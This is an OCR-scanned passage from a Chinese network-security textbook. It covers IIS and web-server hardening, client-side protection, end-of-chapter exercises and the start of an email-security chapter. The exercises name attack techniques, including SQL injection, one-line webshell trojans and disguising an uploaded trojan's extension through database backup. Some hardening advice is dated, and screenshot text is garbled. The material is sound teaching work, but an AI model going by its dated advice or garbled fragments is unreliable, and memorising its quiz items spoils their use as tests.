(1) 避免 安装 在 主 域 控制 器 上 。 
安装 IIS 之 后 ， 在 安装 的 计算 机 上 将 生成 TUSR_Computemame 匿名 账户 。 该 账户 被 
添加 到 域 用 户 组 中 ， 从 而 把 应 用 于 域 用 户 组 的 访问 权限 提供 给 访问 Web 服务 器 的 每 个 匿 
名 用 户 ， 这 不 仅 给 IIS 带 来 潜在 危险 ， 而 且 还 可 能 威胁 整个 域 资源 的 安全 。 所 以 要 尽 可 能 
避免 把 IIS 服务 器 安装 在 域 控 制 器 上 ， 尤 其 是 主 域 控制 器 上 。 
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(2) 避免 安装 在 系统 分 区 上 。 

把 IS 安装 在 系统 分 区 上 ， 会 使 系统 文件 与 IS 同样 面临 非法 访问 ， 容 易 使 非法 用 户 
侵入 系统 分 区 ， 所 以 应 该 避免 将 IIS 服务 器 安装 在 系统 分 区 上 。 

(3) 经 常 到 微软 的 站 点 下 载 IS 的 补丁 程序 ， 保 证 IS 最 新 版 本 。 


6. 用 户 的 安全 性 


1) “匿名 用 户 访问 权限 的 控制 

安装 IIS 后 产生 的 匿名 用 户 IUSR_Computemame( 密 码 随机 产生 )， 其 匿名 访问 给 Web 
服务 器 带 来 潜在 的 安全 性 问题 ， 应 对 其 权限 加 以 控制 。 如 无 匿名 访问 需要 ， 则 可 以 取消 
Web 的 匿名 访问 服务 。 具 体 方法 是 : 

选择 “开始 ”一 “程序 ”一 Microsoft Internet Server( 公 用 ) 一 “Intemet 服务 管理 器 ” 
一 启动 Microsoft Intemet Service Manager- 双击 WWW 启动 WWW 服务 属性 页 一 取消 其 
匿名 访问 服务 。 

2) ”控制 一 般 用 户 访问 权限 

可 以 通过 使 用 数字 与 字母 (包括 大 小 写 ) 结 合 的 口令 ， 使 用 长 口令 (一 般 应 在 6 位 以 
上 )， 经 常 修改 密码 ， 封 锁 失 败 的 登录 尝试 以 及 设 定 账户 的 有 效 期 等 方法 对 一 般 用 户 账户 
进行 管理 。 


7. lIS 三 种 形式 认证 的 安全 性 


(1) 匿名 用 户 访问 : 允许 任何 人 匿名 访问 ， 在 这 三 种 中 安全 性 最 低 。 

(2) 基本 (Basic) 认 证 : 用 户 名 和 口令 以 明文 方式 在 网 络 上 传输 ， 安 全 性 能 一 般 。 

(3) Windows NT 请 求 /响应 方式 : 浏览 器 通过 加 密 方式 与 IS 服务 器 进行 交流 ， 有 效 
地 防止 了 窃听 者 ， 是 安全 性 比较 高 的 认证 形式 。 


8. 访问 权限 控制 


(1) 设置 文件 夹 和 文件 的 访问 权限 : 安放 在 NTFS 文件 系统 上 的 文件 夹 和 文件 ， 一 方 
面 要 对 其 权限 加 以 控制 ， 对 不 同 的 组 和 用 户 设置 不 同 的 权限 ， 另外， 还 可 以 利用 NTFS 的 
审核 功能 对 某 些 特定 组 的 成 员 读 、 写 文件 等 方面 进行 审核 ， 通 过 监视 “文件 访问 ”、“ 用 
户 对 象 的 使 用 ”等 动作 ， 来 有 效 地 发 现 非法 用 户 进行 非法 活动 的 前 兆 ， 及 时 加 以 预防 和 
制止 。 

(2) 设置 WWW 目录 的 访问 权限 : 已 经 设置 成 Web 目录 的 文件 夹 ， 可 以 通过 操作 
Web 站 点 属性 页 实现 对 WWW 目录 访问 权限 的 控制 ， 而 该 目录 下 的 所 有 文件 和 子 文件 夹 
都 将 继承 这 些 安全 机 制 。WWW 服务 除了 提供 NTFS 文件 系统 提供 的 权限 外 ， 还 提供 读 取 
权限 一 一 允许 用 户 读 取 或 下 载 WWW 目录 中 的 文件 ， 执 行 权限 一 一 允许 用 户 运 行 WWW 
目录 下 的 程序 和 脚本 。 具 体 设置 方法 如 下 : 

选择 “我 的 电脑 ”右键 一 “管理 ”一 “Intemet 服务 管理 器 ” 一 启动 Microsoft 
Internet Service Manager 双击 WWW 启动 WWW 服务 属性 页 一 选择 “目录 ”选项 卡 一 
选 定 需要 编辑 的 WWW 目录 一 选择 “编辑 属性 ”中 的 “目录 属性 ”进行 设置 ， 如 图 5-18 
所 示 。 
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IIS 可 以 设置 允许 或 拒绝 从 特定 IP 发 来 的 服务 请 求 ， 有 选择 地 允许 特定 节点 的 用 户 访 
问 。 可 以 通过 设置 来 阻止 指定 IP 地 址 外 的 网 络 用 户 访问 你 的 Web 服务 器 。 具 体 设置 方法 


如 下 。 


选择 “我 的 电脑 ”右键 一 


“管理 ”一 “Interet 服务 管理 器 ” 


一 启动 Microsoft 


Internet Service Manager 一 双击 WWW 启动 WWW 服务 属性 页 一 启动 Web 属性 页 中 的 
“高 级 ”选项 卡 ; 进行 IP 地 址 的 控制 设置 ， 如 图 5-19 所 示 。 


[Esa 


设 | 有 ee i 
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| TP 地 址 池 网 掩 码 ) 


确定 取消 应 用 多 才 助 
图 5-19 人 允许 IP 地 址 访问 控制 


10. 端口 安全 性 的 实现 


对 于 IS 服务 ， 无 论 是 WWW 站 点 、FTP 站 点 ， 还 是 NNTP、SMTP 服务 等 都 有 各 自 
侦 听 和 接收 浏览 器 请 求 的 TCP 端口 号 (Post)， 一 般 常 用 的 端口 号 为 : WWW 是 80、FTP 是 
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21、SMTP 是 25， 你 可 以 通过 修改 端口 号 来 提高 IIS 服务 器 的 安全 性 。 如 果 你 修改 了 端口 
设置 ， 只 有 知道 端口 号 的 用 户 才 可 以 访问 ， 不 过 用 户 在 访问 时 需要 指定 新 端口 号 。 


11. IP 转发 的 安全 性 


IIS 服务 可 提供 卫 数据 包 的 转发 功能 ， 此 时 ， 充 当 路 由 器 角色 的 IIS 服务 器 将 会 把 从 
Internet 接口 收 到 的 人 P 数据 包 转 发 到 内 部 网 中 ， 禁 用 这 一 功能 将 提高 IS 服务 的 安全 性 。 
设置 方法 如 下 : 

选择 “我 的 电脑 ”右键 一 “管理 ”一 “Intemet 服务 管理 器 ” 一 启动 Microsoft 
Internet Service Manager- 双击 WWW 启动 WWW 服务 属性 页 一 选择 “协议 ”选项 卡 一 
在 TCP/IP 属性 中 去 掉 “ 路 由 选择 ”。 


12. SSL 安全 机 制 


SSL( 加 密 套 接 字 协议 层 ) 位 于 HTTP 层 和 TCP 层 之 间 ， 建 立 用 户 与 服务 器 之 间 的 加 密 
通信 ， 确 保 信 息 传 递 的 安全 性 。SSL 是 工作 在 公共 密 钥 和 私人 密 钥 基础 上 的 。 任 何 用 户 都 
可 以 获得 公共 密 钥 来 加 密 数据 ， 但 解密 数据 必须 要 通过 相应 的 私人 密 钥 。 使 用 SSL 安全 
机 制 时 ， 首 先 客户 端 与 服务 器 建立 连接 ， 服 务 器 把 它 的 数字 证 书 与 公共 密 钥 一 并 发 送 给 客 
户 端 ， 客 户 端 随机 生成 会 话 密 铀 ， 用 从 服务 器 得 到 的 公共 密 钥 对 会 话 密 钥 进行 加 密 ， 并 把 
会 话 密 钥 在 网 络 上 传递 给 服务 器 ， 而 会 话 密 钥 只 有 在 服务 器 端 用 私人 密 钥 才能 解密 ， 这 
样 ， 客 户 端 和 服务 器 端 就 建立 了 一 个 唯一 的 安全 通道 。 具 体 设置 方法 如 下 : 

选择 “我 的 电脑 ”右键 一 “管理 ”一 “Intemet 服务 管理 器 ”一 启动 Microsoft 
Internet Service Manager 一 双击 WWW 启动 WWW 服务 属性 页 一 选择 “目录 安全 性 ” 选 
项 卡 一 单 击 “ 密 钥 管 理 器 ”按钮 一 通过 密 钥 管理 器 生成 密 钥 文件 和 请 求 文件 一 从 身份 认证 
权限 中 申请 一 个 证 书 一 通过 密 钥 管理 器 在 服务 器 上 安装 证 书 一 激活 Web 站 点 的 SSL 安全 
性 ， 如 图 5-20 所 示 。 


I 


5-20 开启 SSL 安全 机 制 


建立 了 SSL 安全 机 制 后 ， 只 有 SSL 允许 的 客户 才能 与 SSL 允许 的 Web 站 点 进行 通 
信 ， 并 且 在 使 用 URL 资源 定位 器 时 ， 注 意 输入 的 是 “https://”， 而 不 是 “http://”。 
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SSL 安全 机 制 的 实现 ， 将 增加 系统 开销 ， 增 加 服务 器 CPU 的 额外 负担 ， 从 而 会 在 一 
定 程度 上 降低 系统 性 能 。 


13. 设置 用 户 密码 


用 户 一 定 要 设置 密码 ， 用 户 的 密码 尽量 使 用 数字 与 字母 大 小 混 排 的 口令 ， 还 需要 经 常 
修改 密码 ， 封 锁 失 败 的 登录 尝试 ， 并 且 设 定 严格 的 账户 生存 时 间 ， 定 期 按照 规范 修改 密 
码 。 应 避免 设置 简单 的 密码 ， 且 用 户 的 密码 尽 可 能 不 要 和 用 户 名 有 任何 关联 。 保 证 IS 自 
身 的 安全 性 。 


14. 不 安装 不 必要 的 软件 和 服务 


很 多 第 三 方 软件 有 自己 的 漏洞 ， 有 许多 0Day 就 出 现在 第 三 方 软件 。 很 多 网 管 维护 服 
务 器 都 很 认真 遵循 规则 ， 但 是 往往 在 细节 上 忽视 了 这 些 软件 漏洞 导致 人 为 降低 了 服务 本 身 
的 安全 性 。 所 以 要 从 源头 消除 这 些 不 必要 的 麻烦 ， 就 要 尽量 杜绝 一 些 不 出 名 的 、 没 有 版 权 
的 私人 开发 的 软件 。 


5.4.2 ”服务 器 群 安全 
1. 对 内 部 和 外 部 应 用 分 别 使 用 单独 的 服务 器 


假设 组 织 有 两 类 独立 的 网 络 应 用 ， 面 向 外 部 用 户 的 服务 和 面向 内 部 用 户 的 服务 ， 要 说 
慎 地 将 这 些 应 用 部 署 在 不 同 的 服务 器 上 。 这 样 做 可 以 减少 恶意 用 户 突破 外 部 服务 器 来 获得 
对 敏感 的 内 部 信息 地 访问 。 如 果 你 没有 可 用 的 部 署 工具 ， 你 至 少 应 该 考虑 使 用 技术 控制 
(例如 物理 隔离 )， 使 内 部 和 外 部 应 用 不 会 互相 牵涉 。 


2. 使 用 单独 的 开发 服务 器 测试 和 调试 应 用 软件 


在 单独 的 Web 服务 器 上 测试 应 用 软件 听 起 来 像 是 常识 一 一 的 确 是 。 不 幸 的 是 ， 许 多 
组 织 没 有 遵循 这 个 基本 规则 ， 相 反 允 许 开发 者 在 生产 服务 器 上 调试 代码 甚至 开发 新 软件 。 
这 对 安全 性 和 可 靠 性 来 说 是 很 可 怕 的 。 在 生产 服务 器 上 测试 代码 会 使 用 户 遇 到 故障 ， 当 开 
发 者 提交 未 经 测试 易 受 攻击 的 代码 时 ， 引 入 安全 漏洞 。 大 多 数 现代 版 本 的 控制 系统 (例如 
微软 的 Visual SourceSafe) 有 助 于 编码 、 测 试 、 调 试 过 程 的 自动 化 。 

3. 审查 网 站 活动 ， 安 全 存储 日 志 

每 一 个 安全 专业 人 员 都 知道 维护 服务 器 活动 日 志 的 重要 性 。 由 于 大 多 数 Web 服务 器 
是 公开 的 ， 因 此 ， 对 所 有 互联 网 服务 进行 审核 是 很 重要 的 。 审 核 有 助 你 检测 和 打击 攻击 ， 
并 且 使 用 户 可 以 检修 服务 器 性 能 故障 。 在 高 级 安全 环境 中 ， 确 保 用 户 的 日 志 存储 在 物理 安 
全 的 地 点 一 一 最 安全 的 (但 是 最 不 方便 的 ) 技 巧 是 日 志 一 产生 就 打印 出 来 ， 建 立 不 能 被 入 侵 
者 修改 的 纸 质 记录 ， 前 提 是 入 侵 者 没有 物理 访问 权限 。 也 用 数字 签名 进行 加 密 ， 来 阻止 日 
志 被 窃取 和 修改 。 


4. 培训 开发 者 进行 可 靠 的 安全 编码 
软件 开发 者 致力 于 创建 满足 商业 需求 的 应 用 软件 ， 却 常常 忽略 了 信息 安全 也 是 重要 的 
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商业 需求 。 因 此 ， 对 开发 者 进行 影响 到 Web 服务 器 安全 问题 的 培训 是 必需 的 。 最 终 用 户 
或 管理 人 员 应 该 让 开发 者 了 解 网 络 中 的 安全 机 制 ， 确 保 其 开发 的 软件 不 会 违背 这 些 机 制 ; 
还 要 进行 概念 的 培训 ， 例 如 内 存 泄漏 攻击 和 处 理 隔离 一 一 这 些 对 编码 和 生成 安全 的 应 用 软 
件 大 有 帮助 。 


5. 给 操作 系统 和 Web 服务 器 打 补 丁 


这 是 另 一 个 常识 ， 但 是 当 管理 员 因为 其 他 任务 而 不 堪 重 荷 时 常常 忽略 这 一 点 。 安 全 公 
告 ， 像 是 CERT 或 者 微软 发 布 的 公告 ， 提 醒 人 们 软件 厂商 多 频繁 地 发 布 某 些 安全 漏洞 的 修 
补 程序 。 一 些 工 具 ， 像 微软 的 软件 升级 服务 和 RedHat 的 升级 服务 ， 有 助 于 使 这 项 任务 自 
动 化 。 

公布 漏洞 的 权威 机 构 有 两 个 : 

(1) CVE(Common Vulnerabilities and Exposures)http://cve.mitre.org/ 截至 目前 ， 这 里 
收录 着 两 万 多 个 漏洞 。CVE 会 对 每 个 公布 的 漏洞 进行 编号 、 审 查 。CVE 编号 通常 也 是 引 
用 漏洞 的 标准 方式 。 

(2) CERT(Computer Emergency Response Team)http://www.cert.org/ 计算 机 应 急 响应 
组 往往 会 在 第 一 时 间 跟 进 。 

当前 的 严重 漏洞 ， 包 括 描述 信息 、POC 的 发 布 链接 、 厂 商 的 安全 响应 进度 、 用 户 应 
该 采取 的 临时 性 防范 措施 等 。 总 之 ， 一 旦 漏洞 公布 ， 如 果 你 不 修补 它 ， 迟 早 会 被 人 发 现 并 
利用 。 


6. 使 用 应 用 软件 扫描 


管理 人 员 应 该 自主 进行 漏洞 发 现 ， 定 期 扫描 服务 器 和 软件 漏洞 。 在 黑客 发 现 你 的 网 站 
漏洞 并 入 侵 前 自己 发 现 网 站 的 缺陷 ， 像 nessus( 如 图 5-21 所 示 ) 这 样 的 工具 有 助 于 确保 编码 
在 生产 环境 里 不 会 存在 严重 漏洞 。 


Messus 国 ， 


>TENABLE 


图 5-21 nessus 
7. 借助 安全 产品 


可 以 借助 其 他 安全 产品 加 强 Web 服务 器 的 安全 ， 如 运用 网 络 防火 墙 、IDS、IPS 进行 
入 侵 防 护 和 检测 。 
另外 ， 还 要 有 安全 意识 。 设 计 良 好 的 Web 服务 器 结构 应 该 基于 健全 的 安全 政策 。 
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5.5 ”Web 客户 安全 机 制 
对 于 客户 端 Web 安全 主要 从 安全 意识 和 安全 措施 入 手 。 


5.5.1 安全 措施 
1. 正确 配置 系统 设置 


正确 配置 系统 设置 ， 关 闭 不 必要 的 共享 和 服务 。 开 机 启动 项 关闭 不 需要 启动 和 陌生 嫌 
疑 的 进程 服务 。 

如 图 5-22 所 示 在 “开始 ”一 “运行 ”中 输入 “msconfig”， 进 入 “系统 配置 实用 程 
序 ” 的 启动 项 进行 设置 。 当 然 很 多 第 三 方 软件 包括 360 安全 卫士 、 金 山 安全 卫士 等 都 有 类 
似 的 功能 ， 有 些 设置 更 安全 直观 ， 可 以 使 用 。 


Ne 
一 般 “| srsrm nr| vm mri poor nz 服务 局 动 |I 具 | 


to regswr32 /5 nqrt. dll WUANSOPTIARE' 
“Ci Mocwments and 


sttray. exe 
CNIIDOYSVsystem， 
wm Files 


Ca _w | saw | ww | 
5-22 ”开机 启动 项 


2. 定期 为 你 的 系统 更 新 补丁 

微软 发 布 最 新 补丁 一 般 是 在 每 周二 。 可 以 用 360 漏洞 修复 等 第 三 方 软件 来 帮助 我 们 完 
成 最 新 漏洞 的 修补 。 

3. 安装 杀毒 软件 和 防火 墙 

有 很 多 不 错 的 免费 杀毒 软件 如 avast、360、 小 红 伞 等 ， 用 户 可 以 选择 安装 一 种 ， 也 有 
收费 的 杀毒 软件 ， 在 条 件 允 许 的 情况 下 ， 收 费 的 杀毒 软件 可 提供 更 优质 的 服务 ， 防 护 质量 
也 比 一 些 免 费 的 杀毒 软件 好 。 

防火 墙 ， 个 人 用 户 可 以 选择 ZoneAlarm、Outpost、Comodo 等 。 

4. 安装 新 版 浏览 器 


现在 的 大 多 客户 端 操作 系统 是 Win7 或 XP， 微 软 对 于 客户 端的 安全 还 是 比较 重视 
的 ， 在 推出 新 的 界面 和 功能 上 更 人 性 化 ， 在 浏览 器 的 安全 上 也 增加 新 的 技术 ， 所 以 有 必要 
更 新 一 下 你 的 正 版 本 ， 如 图 5-23 所 示 。 往 往 旧 版 正 出 现 过 很 多 的 注入 提升 权限 漏洞 。 
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[ET Lz] 
1 
fs Windows"Internet 
Bp orer9 


bs: 
4 


图 5-23 IE 9 浏览 器 


5.5.2 ”安全 注意 事项 
1. 不 访问 一 些 非 正式 私人 网 站 


不 访问 具有 诱惑 信息 的 网 站 ， 包 括 不 健康 信息 、 赌 博 、 游 戏 外 挂 等 网 站 。 很 多 这 类 网 
站 都 是 黑客 编写 的 钓鱼 网 站 ， 含 有 恶意 脚本 、 木 马 。 在 客户 端 没 有 安装 相应 的 防御 措施 
下 ， 这 些 网 页 很 容易 传播 病毒 到 你 的 计算 机 。 有 的 盗 取 用 户 账号 信息 ， 有 的 侵犯 用 户 隐 
私 、 毁 坏 数 据 。 


2. 定期 进行 扫描 杀毒 


定期 杀毒 是 很 好 的 习惯 ， 用 户 可 以 在 休息 时 让 计算 机 利用 空闲 时 间 来 进行 此 项 工作 ， 
以 保证 电脑 资料 的 安全 。 


3. 密码 设置 不 能 过 于 简单 


密码 设置 不 要 过 于 简单 ， 最 好 有 字母 、 数 字 、 符 号 组 合 。 前 提 是 密码 强度 既 要 符合 要 
求 ， 也 不 能 过 于 难 记 导 致 不 久 便 会 忘记 。 


5.6 本 章 小 结 


Web 安全 直接 关系 着 用 户 的 上 网 安全 ， 本 章 由 浅 入 深 地 介绍 了 Web 安全 的 威胁 和 防 
护 。 首 先 介 绍 了 Web 服务 的 脆弱 性 、Web 攻击 的 发 展 ， 接 着 重点 介绍 了 针对 Web 的 攻击 
方法 ， 详 细 讲 述 了 一 些 常用 攻击 方法 的 过 程 ， 然 后 介绍 了 Web 欺骗 和 防护 ， 最 后 分 别 讲 
述 了 服务 器 端 和 客户 端的 Web 安全 防护 。 


5.7 课 后 习题 


1. 填空 题 


(1) 最 常见 的 Web 架构 模型 中 ， 是 第 一 层 ; 使 用 的 部 分 
属于 中 间 层 ; 数据 库 是 第 三 层 。 
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(2) 寻找 后 台 入 口 的 软件 共同 的 特点 是 从 . 里 面 读 取 后 台 可 能 的 地 址 
列表 。 
2. 选择 题 
(1) Cookies 不 能 记录 的 信息 是 ( ), 
A. 用 户 ID B. 浏览 过 的 网 页 
C. 上 网 时 修改 的 本 地 文件 DD 用 户 停留 时 间 
(2) 虽然 一 般 网 站 对 上 传 文件 类 型 有 限制 ， 但 是 可 以 采取 ( ”) 方 式 攻 破 。 
A. Cookies 欺骗 B. SQL 注入 
C. 拒绝 服务 攻击 D. 植 入 木马 


(3) 一 句 话 木马 的 适用 环境 是 (。 )。 
A. 服务 器 的 来 宾 账户 有 读 权限 
B. 数据 库 格式 为 php 
C. 已 知 数据 库 地 址 且 数 据 库 格式 为 asa 或 asp 
D. 服务 器 拒绝 上 传 服务 
(4) 可 以 通过 数据 库 的 (  ) 功 能 改变 上 传 的 图 片 木 马 文件 的 扩展 名 。 


A. 查询 B. 索引 C. 备份 D. 压缩 
3. 判断 题 
(1) Session 在 用 户 端 ， 采 用 加 密 方式 存放 数据 。 人 
(2) 对 于 Web 服务 器 来 说 ， 威 胁 来 自 外 部 ， 可 以 建立 对 内 部 的 完全 信任 关系 。 (  ) 
(3) SQL 注入 中 可 以 利用 系统 表 判断 数 据 库 的 类 型 。 OS， 
4. 简 答题 


(1) 简 述 SQL 注入 入 侵 的 过 程 。 

(2) 在 SQL 注入 中 如 何 判断 字符 型 参数 ? 
(3) 进行 旁 注 入 侵 的 前 提 是 什么 ? 

(4) 什么 叫 点 击 劫持 ? 

(5) 简 述 Web 病毒 入 侵 的 过 程 。 

(6) 如 何 加 强 Web 服务 器 的 安全 ? 


电子 邮件 (E-maiD) 技 术 从 诞生 到 现在 已 有 40 多 年 的 历史 ， 由 于 
电子 邮件 具有 方便 、 快 捷 、 经 济 等 特点 ， 人 们 对 它 的 依赖 程度 日 益 
增强 。 在 大 力 推进 政府 信息 化 、 企 业 信 息 化 、 电 子 商 务 活动 的 形势 
下 ， 电 子 邮 件 系统 面临 着 十 分 严峻 的 安全 威胁 : 既 要 防止 黑客 的 攻 
击 ， 又 要 防范 针对 邮件 系统 的 病毒 邮件 蔓延 ; 既 要 防止 垃圾 邮件 泛 
滥 ， 又 要 提防 内 部 敏感 资料 的 泄露 。 
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6.1 电子 邮件 系统 概述 


电子 邮件 (Electronic Mail， 简 称 E-mail) 又 称 电子 信箱 、 电 子 邮 政 ， 它 是 一 种 用 电子 手 
段 提供 信息 交换 的 通信 方式 ， 是 Intemet 应 用 最 广 的 服务 。 通 过 网 络 的 电子 邮件 系统 ， 用 
户 可 以 用 非常 低廉 的 价格 ， 以 非常 快速 的 方式 ， 与 世界 上 任何 一 个 角落 的 网 络 用 户 联系 。 
这 些 电 子 邮 件 可 以 是 文字 、 图 像 、 声 音 等 各 种 方式 。 同 时 ， 用 户 可 以 得 到 大 量 免 费 的 新 
闻 、 专 题 邮件 ， 并 实现 轻松 的 信息 搜索 。 


6.1.1 电子 邮件 系统 原理 


电子 邮件 是 通信 技术 和 计算 机 技术 结合 的 产物 ， 它 不 是 一 种 “终端 到 终端 ”的 服务 ， 
是 “存储 转发 式 ” 服 务 ， 属 于 异步 通信 方式 。 

电子 邮件 的 目的 是 在 网 上 设立 “电子 信箱 系统 ”。 系 统 的 硬件 是 一 个 高 性 能 、 大 容量 
的 计算 机 或 计算 机 组 ， 磁 盘 作为 信箱 的 存储 介质 ， 在 磁盘 上 为 用 户 分 一 定 的 存储 空间 作为 
用 户 的 “信箱 ”。 系 统 功能 主要 由 软件 实现 。 


1. MOTIS 邮件 系统 模型 


电子 邮件 系统 采用 客户 机 /服务 器 结构 ， 即 C/S 结构 。ISO/OSI 的 电子 邮件 系统 模型 叫 
做 MOTIS(Message-Oriented Text Interchange Systems， 面 向 文 电 的 文本 交换 系统 )，MOTIS 
系统 由 两 部 分 组 成 : 用 户 代理 UA(User AgenD 和 文 电 传输 代理 MTA(Message Transfer 
Agent)。 

在 电子 邮件 系统 的 具体 实现 中 ，UA 与 MTA 往往 不 在 同一 机 器 上 。UA 一 般 放 在 个 人 
计算 机 内 ，MTA 一 般 放 在 服务 器 中 ， 一 个 MTA 可 以 带 若干 UA， 如 图 6-1 所 示 。 在 许多 
MTA 上 ， 都 有 一 个 叫 文 电 库 (Message Store，MS) 的 设施 ， 是 MTA 所 在 机 器 上 的 一 个 专 
用 存储 器 。MS 为 每 一 用 户 开设 一 个 电子 邮箱 ， 到 来 的 文 电 可 以 存放 在 邮箱 中 ， 直 到 用 户 


登录 后 来 处 置 它 。 


UA UA 
MS MS | 
MIA MTA 
表示 层 及 以 下 各 层 


6-1 MOTIS 电子 邮件 系统 模型 
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用 户 代 理 UA 是 收发 邮件 的 客户 端 程序 ， 提 供 阅读 、 发 送 、 和 接收 电子 邮件 的 用 户 接 
口 。UA 至 少 具 有 三 个 功能 : 撰写 邮件 、 显 示 邮 件 和 处 理 邮 件 。UA 有 多 重 形式 ， 有 基于 
文本 的 、 基 于 Web 的 ， 还 有 GUI 应 用 程序 的 。 常 用 的 Outlook、Foxmail 属于 最 后 一 种 。 

邮件 传输 代理 MTA 也 叫 “ 电 子 邮局 ”， 负 责 将 来 自 UA 的 信件 转发 给 指定 用 户 ， 以 
完成 邮件 的 存储 转发 。MTA 应 该 具备 如 下 功能 : 

@ ”接受 和 传递 由 客户 端 发 送 的 邮件 ; 

e@ ”维护 邮件 队列 ， 以 便 客户 端 不 必 一 直 等 到 邮件 真正 发 送出 去 ; 

@ ”接收 客户 的 邮件 ， 并 将 邮件 放置 在 缓冲 区 存储 ， 直 到 用 户 链 接 从 而 收取 邮件 ; 

@ 有 选择 地 转发 和 拒绝 转发 接受 到 的 、 目 的 地 为 另 一 个 主机 的 消息 。 

常用 的 软件 有 : Windows 下 的 exchange，Linux 下 的 sendmail、qmail、postfix。 

另外 ， 还 有 一 种 邮件 系统 模型 是 把 MS 单独 出 来 ， 因 此 ， 邮 件 系统 由 三 部 分 组 成 : 用 
户 代 理 MUA(Mail User AgenD、 邮 件 传输 代理 MTA(Mail Transfer Agent) 和 邮件 投递 代理 
MDA(Mail Delivery Agent)。MDA 类 似 于 MS， 负 责 将 MTA 接收 的 信件 依照 信件 的 流 
向 ， 将 该 信件 放置 到 本 机 账户 下 的 邮件 文件 中 ( 收 件 箱 )。 


2. 邮件 发 送 过 程 
在 MOTIS 模型 中 ， 邮 件 的 发 送 接收 过 程 如 图 6-2 所 示 。 


MIA FR” MIA rr” MIA a” MIA 
本 4 
| | | | 
邮件 队列 邮件 队列 邮件 队列 邮件 队列 
本 
里 
UA MS 
下 
更 
发 送 方 UA 
接收 方 


图 6-2 电子 邮件 发 送 接收 过 程 
首先 ， 发 信人 调用 UA 来 编辑 要 发 送 的 邮件 ，MUA 使 用 SMTP 协议 把 邮件 传送 给 发 


送 端 邮 件 服务 器 的 MTA。 
MTA 首先 将 邮件 放 入 邮件 缓存 队列 中 ， 依 次 处 理 ， 然 后 MTA 通过 查询 收 件 方 域名 
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的 MX 记录 获得 对 方 邮件 服务 器 的 IP 地 址 ， 本 地 MTA 向 接收 端 邮件 服务 器 MTA 发 起 
TCP 连接 申请 。TCP 连接 建立 后 ， 发 送 端 MTA 使 用 SMTP 协议 向 接收 端 MTA 发 送 邮 
件 ， 邮 件 发 送 完毕 后 关闭 TCP 连接 。 

接收 端 MTA 把 邮件 放 到 邮件 队列 ， 因 为 是 发 往 本 地 的 信件 ， 所 以 MTA 根据 收 件 人 
信息 把 信件 交 由 MS( 或 MDA)， 信 件 被 放 到 指定 的 文件 夹 中 。 收 件 人 打算 收 信 时 ， 调 用 用 
户 代理 ， 使 用 POP3( 或 IMAP) 协 议 从 服务 器 的 个 人 邮箱 中 取出 。 

通常 ， 当 用 户 从 MUA 中 发 送 一 份 邮件 时 ， 该 邮件 会 被 发 送 送 到 MTA， 而 后 在 一 系 
列 MTA 中 转发 ， 直 到 它 到 达 最 终 发 送 目 标 为 止 。 


3. TCP/IP 电子 邮件 系统 模型 


与 MOTIS 不 同 ，TCP/IP 自始至终 坚持 端 到 端的 思想 ， 它 的 电子 邮件 系统 也 不 例外 ， 
采用 端 到 端的 传输 方式 。TCP/IP 的 电子 邮件 系统 分 为 用 户 界面 和 文件 传输 两 部 分 ， 但 文 
件 传输 部 分 并 未 独立 出 来 。 

在 端 到 端 方式 中 ， 虽 然 初始 主机 要 参与 邮件 传输 的 全 过 程 ， 但 由 于 TCP/IP 下 层 协议 
的 简洁 性 ， 其 效率 反而 比 存储 转发 来 得 高 。 

在 邮件 的 发 送 过 程 中 ， 接 收 方 有 可 能 不 在 。TCP/IP 邮件 系统 没有 引入 像 MTA 这 样 的 
存储 转发 机 构 ， 而 是 采用 spooling( 假 脱 机 ) 缓 冲 技术 来 解决 延迟 传递 问题 ， 将 用 户 收 发 邮 


用 | | 发 送 邮件 的 客户 
| spooling 区 〈 后 台 发 送 ) 
用 | 
| | 
接 | 
no 
用 | | 发 送 邮件 的 服务 器 
国 | spooling 区 〈 邮 件 接收 ? 


Ls nn 


图 6-3 TCP/IP 电子 邮件 系统 模型 


电子 邮件 地 址 的 格式 为 local-name@domain-name， 第 一 部 分 标识 用 户 的 邮箱 ， 第 二 部 
分 标识 邮箱 所 在 的 服务 器 ， 如 lili@163.com。 一 个 邮箱 除了 有 一 个 正式 的 地 址 外 ， 还 可 以 
有 别名 (Alias)， 一 个 邮箱 可 以 有 一 个 或 多 个 别名 。 


6.1.2 邮件 系统 安全 性 要 求 


电子 邮件 在 给 人 们 带 来 便利 的 同时 ， 也 带 来 了 安全 隐患 。 病 毒 利用 邮件 进行 传播 ， 不 
法 分 子 利用 邮件 进行 欺骗 ， 大 量 的 垃圾 邮件 填 满 邮 箱 ， 致 使 用 户 无 法 收取 合法 邮件 。 如 何 
保障 电子 邮件 系统 的 安全 ， 过 制 非法 邮件 传播 ， 保 护 合法 邮件 ， 保 障 系统 稳定 运行 ， 主 要 
从 以 下 几 方 面 考虑 : 
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1. 反 垃 圾 邮件 


由 于 电子 邮件 能 够 方便 快捷 地 传递 信息 ， 并 且 成 本 极 低 ， 所 以 常 被 滥用 于 传播 各 种 信 
息 ， 例 如 广告 、 色 情 、 政 治 敏感 信息 等 ; 许多 非法 信息 邮件 ， 如 法 轮 功 邮件 等 ， 往 往 更 常 
见 的 发 送 对 象 是 企业 集团 、 政 府 、 高 校 及 科研 院 所 等 机 构 。 大 量 的 垃圾 邮件 给 用 户 带 来 极 
大 麻烦 ， 甚 至 有 可 能 产生 不 良 的 影响 。 


2. 反 病 毒 邮件 


由 于 电子 邮件 的 传递 速度 极 快 ， 已 经 成 为 病毒 散播 的 最 主要 途径 与 载体 。 另 外 ， 垃 圾 
邮件 和 病毒 间 的 界线 已 经 十 分 模糊 ， 未 来 将 更 模糊 。 病 毒 作者 在 被 感染 的 计算 机 上 开 后 
门 ， 而 这 些 被 感染 的 计算 机 则 能 够 用 来 大 量 发 送 垃圾 邮件 ， 这 是 一 个 趋势 。 有 的 垃圾 邮件 
更 携带 木马 病毒 ， 一 旦 进入 用 户 的 电脑 ， 就 可 以 盗 取 用 户 包括 网 上 银行 密码 在 内 的 各 种 数 
据 ， 也 能 删除 用 户 的 各 种 文件 ， 已 经 严重 影响 到 了 用 户 的 数据 安全 。 


3. 邮件 加 密 


随 着 企业 电子 文档 资料 的 日 益 丰 富 ， 许 多 企业 内 部 不 法 员工 也 经 常会 选择 利用 电子 邮 
件 将 机 密 资料 快速 转移 ， 以 达到 非法 目的 。 因 此 ， 如 何 防止 内 外 有 心 人 士 对 邮件 信息 进行 
窃取 、 算 改 ， 对 重要 的 信息 能 否 自主 进行 邮件 加 密 ， 这 是 邮件 系统 安全 通讯 的 首要 条 件 。 
